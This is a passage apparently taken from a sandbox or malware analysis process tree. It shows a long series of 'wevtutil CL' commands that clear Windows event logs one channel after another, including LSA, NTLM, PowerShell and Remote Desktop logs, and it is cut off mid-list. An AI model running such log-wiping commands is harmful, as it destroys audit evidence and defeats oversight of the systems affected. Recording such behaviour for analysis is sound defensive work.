    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Operational"
        5⤵
        
        PID:4616
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Performance"
        5⤵
        
        PID:4052
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Known Folders API Service"
        5⤵
        
        PID:1684
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-L2NA/Diagnostic"
        5⤵
        
        PID:2928
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LDAP-Client/Debug"
        5⤵
        
        PID:4644
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LSA/Diagnostic"
        5⤵
        
        PID:280
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LSA/Operational"
        5⤵
        
        PID:2064
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LSA/Performance"
        5⤵
        
        PID:4204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Analytic"
        5⤵
        
        PID:3804
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
        5⤵
        
        PID:4464
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Debug"
        5⤵
        
        PID:4352
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Operational"
        5⤵
        
        PID:4128
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LimitsManagement/Diagnostic"
        5⤵
        
        PID:732
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
        5⤵
        
        PID:4032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
        5⤵
        
        PID:1328
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LiveId/Analytic"
        5⤵
        
        PID:4776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-LiveId/Operational"
        5⤵
        
        PID:2732
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
        5⤵
        
        PID:4240
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MPS-CLNT/Diagnostic"
        5⤵
        
        PID:1552
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MPS-DRV/Diagnostic"
        5⤵
        
        PID:4384
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MPS-SRV/Diagnostic"
        5⤵
        
        PID:1128
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MSFTEDIT/Diagnostic"
        5⤵
        
        PID:2040
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MSPaint/Admin"
        5⤵
        
        PID:4968
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MSPaint/Debug"
        5⤵
        
        PID:1352
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MSPaint/Diagnostic"
        5⤵
        
        PID:5024
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MUI/Admin"
        5⤵
        
        PID:3764
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MUI/Analytic"
        5⤵
        
        PID:4112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MUI/Debug"
        5⤵
        
        PID:4812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MUI/Operational"
        5⤵
        
        PID:2748
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Media-Streaming/DMC"
        5⤵
        
        PID:2176
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Media-Streaming/DMR"
        5⤵
        
        PID:1428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Media-Streaming/MDE"
        5⤵
        
        PID:1664
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
        5⤵
        
        PID:2560
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
        5⤵
        
        PID:1752
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
        5⤵
        
        PID:5092
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"
        5⤵
        
        PID:968
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
        5⤵
        
        PID:272
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
        5⤵
        
        PID:4592
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
        5⤵
        
        PID:308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Minstore/Analytic"
        5⤵
        
        PID:3344
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Minstore/Debug"
        5⤵
        
        PID:3108
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
        5⤵
        
        PID:4636
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"
        5⤵
        
        PID:3824
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"
        5⤵
        
        PID:4452
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
        5⤵
        
        PID:1592
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"
        5⤵
        
        PID:4396
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-MobilityCenter/Performance"
        5⤵
        
        PID:3576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"
        5⤵
        
        PID:1572
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot"
        5⤵
        
        PID:4412
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Debug"
        5⤵
        
        PID:2368
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService"
        5⤵
        
        PID:1580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Mprddm/Operational"
        5⤵
        
        PID:1568
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NCSI/Analytic"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NCSI/Operational"
        5⤵
        
        PID:2608
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
        5⤵
        
        PID:4472
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
        5⤵
        
        PID:3956
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NDIS/Diagnostic"
        5⤵
        
        PID:3620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NTLM/Operational"
        5⤵
        
        PID:5116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NDIS/Operational"
        5⤵
        
        PID:4372
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NWiFi/Diagnostic"
        5⤵
        
        PID:1848
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Narrator/Diagnostic"
        5⤵
        
        PID:3888
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Ncasvc/Operational"
        5⤵
        
        PID:1912
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NcdAutoSetup/Diagnostic"
        5⤵
        
        PID:2392
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NcdAutoSetup/Operational"
        5⤵
        
        PID:3636
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NdisImPlatform/Operational"
        5⤵
        
        PID:816
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Ndu/Diagnostic"
        5⤵
        
        PID:4200
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetShell/Performance"
        5⤵
        
        PID:4924
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Network-Connection-Broker"
        5⤵
        
        PID:4860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Network-DataUsage/Analytic"
        5⤵
        
        PID:4052
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Network-Setup/Diagnostic"
        5⤵
        
        PID:1684
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
        5⤵
        
        PID:2928
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkBridge/Diagnostic"
        5⤵
        
        PID:4644
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkLocationWizard/Operational"
        5⤵
        
        PID:3092
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Diagnostic"
        5⤵
        
        PID:3860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Operational"
        5⤵
        
        PID:4464
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkProvider/Operational"
        5⤵
        
        PID:4688
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkProvisioning/Analytic"
        5⤵
        
        PID:5076
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkProvisioning/Operational"
        5⤵
        
        PID:4964
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkStatus/Analytic"
        5⤵
        
        PID:4032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NetworkSecurity/Debug"
        5⤵
        
        PID:1300
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Networking-Correlation/Diagnostic"
        5⤵
        
        PID:1328
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
        5⤵
        
        PID:4776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NlaSvc/Diagnostic"
        5⤵
        
        PID:4308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-NlaSvc/Operational"
        5⤵
        
        PID:2192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Ntfs/Operational"
        5⤵
        
        PID:4604
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Ntfs/Performance"
        5⤵
        
        PID:3096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Ntfs/WHC"
        5⤵
        
        PID:3600
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OLE/Clipboard-Performance"
        5⤵
        
        PID:2744
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OLEACC/Debug"
        5⤵
        
        PID:2932
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OLEACC/Diagnostic"
        5⤵
        
        PID:3356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic"
        5⤵
        
        PID:4820
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-Core/Diagnostic"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-DUI/Diagnostic"
        5⤵
        
        PID:4196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-DUI/Operational"
        5⤵
        
        PID:4812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic"
        5⤵
        
        PID:2748
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OcpUpdateAgent/Operational"
        5⤵
        
        PID:2176
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Analytic"
        5⤵
        
        PID:1428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Debug"
        5⤵
        
        PID:1664
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Operational"
        5⤵
        
        PID:4524
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OfflineFiles/SyncLog"
        5⤵
        
        PID:1532
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OneBackup/Debug"
        5⤵
        
        PID:3968
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OneX/Diagnostic"
        5⤵
        
        PID:2808
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OneX/Operational"
        5⤵
        
        PID:4592
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OobeLdr/Analytic"
        5⤵
        
        PID:4056
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-OtpCredentialProvider/Operational"
        5⤵
        
        PID:4692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PCI/Diagnostic"
        5⤵
        
        PID:984
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Analytic"
        5⤵
        
        PID:796
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Debug"
        5⤵
        
        PID:4208
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Operational"
        5⤵
        
        PID:1632
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ParentalControls/Operational"
        5⤵
        
        PID:1808
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Partition/Analytic"
        5⤵
        
        PID:1584
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Partition/Diagnostic"
        5⤵
        
        PID:1516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PerceptionRuntime/Operational"
        5⤵
        
        PID:4356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PerceptionSensorDataService/Operational"
        5⤵
        
        PID:3668
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Analytic"
        5⤵
        
        PID:4620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic"
        5⤵
        
        PID:3640
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Operational"
        5⤵
        
        PID:2080
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Analytic"
        5⤵
        
        PID:3188
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic"
        5⤵
        
        PID:1200
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Operational"
        5⤵
        
        PID:2860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Analytic"
        5⤵
        
        PID:1456
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Certification"
        5⤵
        
        PID:3812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Diagnose"
        5⤵
        
        PID:268
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Operational"
        5⤵
        
        PID:1008
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PhotoAcq/Analytic"
        5⤵
        
        PID:4988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PlayToManager/Analytic"
        5⤵
        
        PID:776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Policy/Analytic"
        5⤵
        
        PID:396
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Policy/Operational"
        5⤵
        
        PID:4404
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
        5⤵
        
        PID:264
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
        5⤵
        
        PID:1776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Power-Meter-Polling/Diagnostic"
        5⤵
        
        PID:1788
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerCfg/Diagnostic"
        5⤵
        
        PID:4924
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerCpl/Diagnostic"
        5⤵
        
        PID:4860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
        5⤵
        
        PID:3168
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
        5⤵
        
        PID:4420
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
        5⤵
        
        PID:1768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
        5⤵
        
        PID:280
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerShell/Admin"
        5⤵
        
        PID:1232
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerShell/Analytic"
        5⤵
        
        PID:3092
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerShell/Debug"
        5⤵
        
        PID:3860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PowerShell/Operational"
        5⤵
        
        PID:3856
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PrimaryNetworkIcon/Performance"
        5⤵
        
        PID:2196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PrintBRM/Admin"
        5⤵
        
        PID:1132
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PrintService-USBMon/Debug"
        5⤵
        
        PID:3104
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PrintService/Admin"
        5⤵
        
        PID:2580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PrintService/Debug"
        5⤵
        
        PID:1016
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PrintService/Operational"
        5⤵
        
        PID:880
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Privacy-Auditing/Operational"
        5⤵
        
        PID:4776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ProcessStateManager/Diagnostic"
        5⤵
        
        PID:4308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/Analytic"
        5⤵
        
        PID:3172
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade"
        5⤵
        
        PID:3528
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
        5⤵
        
        PID:3096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/AutoPilot"
        5⤵
        
        PID:3748
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug"
        5⤵
        
        PID:2744
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/ManagementService"
        5⤵
        
        PID:2932
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Proximity-Common/Diagnostic"
        5⤵
        
        PID:3356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Proximity-Common/Informational"
        5⤵
        
        PID:4064
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Proximity-Common/Performance"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PushNotification-Developer/Debug"
        5⤵
        
        PID:4196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PushNotification-InProc/Debug"
        5⤵
        
        PID:4812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Admin"
        5⤵
        
        PID:1536
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Debug"
        5⤵
        
        PID:616
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Operational"
        5⤵
        
        PID:3992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-QoS-Pacer/Diagnostic"
        5⤵
        
        PID:4900
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-QoS-qWAVE/Debug"
        5⤵
        
        PID:1752
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RPC-Proxy/Debug"
        5⤵
        
        PID:1532
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RPC/Debug"
        5⤵
        
        PID:1464
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RPC/EEInfo"
        5⤵
        
        PID:3820
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RRAS/Debug"
        5⤵
        
        PID:2516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RRAS/Operational"
        5⤵
        
        PID:308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RadioManager/Analytic"
        5⤵
        
        PID:3344
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
        5⤵
        
        PID:3108
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RasAgileVpn/Debug"
        5⤵
        
        PID:4636
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RasAgileVpn/Operational"
        5⤵
        
        PID:4452
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ReFS/Operational"
        5⤵
        
        PID:1908
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Analytic"
        5⤵
        
        PID:824
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Operational"
        5⤵
        
        PID:2244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Analytic"
        5⤵
        
        PID:2116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Operational"
        5⤵
        
        PID:3020
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Regsvr32/Operational"
        5⤵
        
        PID:4740
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
        5⤵
        
        PID:1828
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"
        5⤵
        
        PID:1052
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Admin"
        5⤵
        
        PID:5060
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Operational"
        5⤵
        
        PID:540
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Tracing"
        5⤵
        
        PID:4536
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
        5⤵
        
        PID:4472
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
        5⤵
        
        PID:3956
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
        5⤵
        
        PID:4244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
        5⤵
        
        PID:4372
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug"
        5⤵
        
        PID:5116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug"
        5⤵
        
        PID:1848
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
        5⤵
        
        PID:3888
    - - C:\Windows\system32\wevtutil.exe
        
